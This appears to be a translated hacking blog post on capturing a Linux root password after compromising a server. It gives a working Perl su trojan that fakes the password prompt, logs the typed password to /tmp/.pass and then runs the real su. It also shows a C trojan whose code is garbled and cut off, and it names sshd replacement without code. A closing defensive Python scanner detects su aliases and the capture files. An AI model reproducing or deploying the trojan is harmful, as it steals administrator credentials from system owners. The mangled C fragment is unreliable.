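Summary
When the web backdoor itself is already running as root (vanishingly unlikely), or after an overflow through some vulnerability has given us the highest privileges, being able to obtain the root password brings us many benefits. I looked up the methods used by those who came before: one is to trick su into recording the password, and the other is to replace sshd. Let's look at the code that tricks su into recording the password first!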
First, the first method: kpr-fakesu.c V0.9beta167
fucksu.c
/*
 * kpr-fakesu.c V0.9beta167 ;P
 * by koper >.bash_profile
 * [email protected]:~$ logout
 * *** LOGIN ***
 * [email protected]:~$ su
 * Password:
 * su: Authentication failure
 * Sorry.
 * [email protected]:~$ su
 * Password:
 * [email protected]:~# logout
 * [email protected]:~$ cat /var/tmp/.pwds
 * [email protected]:~$
 *
 * /bin/su sends various failure information depending on the OS ver.
 * Please modify the source to make it “fit” ;)
 *
 */
#include #i[email protected]”); }
Perl version:
#!/usr/bin/perl
####################################################################################################
# [email protected] 2006 su trojan check so the su path is correct. #
# then make alias for trojan first it reads the pass then exec the real su. #
# logging to /tmp/.pass #
####################################################################################################
print “Password: “;
$s1=;
print “Sorry.n”;
$s2=”Password is: “;
$s3=date +%Y-%m-%d;
open (users, “>>/tmp/.pass”) || die (“Could not open file. $!”);
print users ($s2, $s1,$s3);
close (users);
system(“/bin/su”)

The other method: replacing sshd
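Seen from the defender's side, the two su trojans above leave the same traces: an su override in a shell startup file (the .bash_profile reference and the "make alias" note in their header comments) and a capture file (/var/tmp/.pwds, /tmp/.pass). The check below is an added example, not code from the original post; the trusted command list and the sample profile are assumptions, and the shell-function check goes beyond the alias case the headers mention.

```python
import os
import re

# Commands an "su" alias may legitimately start with (assumption; adjust per distro).
TRUSTED_SU = {"su", "/bin/su", "/usr/bin/su"}
# Capture files named in the header comments of the two trojans on this page.
DROP_FILES = ["/var/tmp/.pwds", "/tmp/.pass"]

ALIAS_SU = re.compile(r"""(?:^|\s)su=(?:'([^']*)'|"([^"]*)"|(\S*))""")
FUNC_SU = re.compile(r"^(?:function\s+su\b|su\s*\(\s*\))")

def scan_rc(text, source="<rc>"):
    """Return (source, line_no, reason) for each su override in shell startup text."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if FUNC_SU.match(line):
            findings.append((source, no, "shell function named su"))
        elif line.startswith("alias"):
            m = ALIAS_SU.search(line[len("alias"):])
            if m:
                value = next(g for g in m.groups() if g is not None)
                words = value.split()
                cmd = words[0] if words else "(empty)"
                if cmd not in TRUSTED_SU:
                    findings.append((source, no, f"alias su -> {cmd}"))
    return findings

def drop_files_present(root="/"):
    """Return the page's capture-file paths that exist under root (a mounted image works too)."""
    return [p for p in DROP_FILES if os.path.lexists(os.path.join(root, p.lstrip("/")))]

# Constructed sample of a tampered ~/.bash_profile (not taken from the page).
SAMPLE = """\
# .bash_profile
export PATH=$PATH:$HOME/bin
alias ll='ls -l' su='/var/tmp/.su'
alias sudo='sudo '
# alias su=/tmp/x
alias su="su -"
su() { /home/user/.cache/su "$@"; }
"""

if __name__ == "__main__":
    for finding in scan_rc(SAMPLE, "~/.bash_profile"):
        print(*finding, sep=": ")
    print("capture files present:", drop_files_present())
```

Run scan_rc over every account's startup files (.bash_profile, .bashrc, .profile) and treat any hit, or any existing capture file, as a reason to rotate the root password.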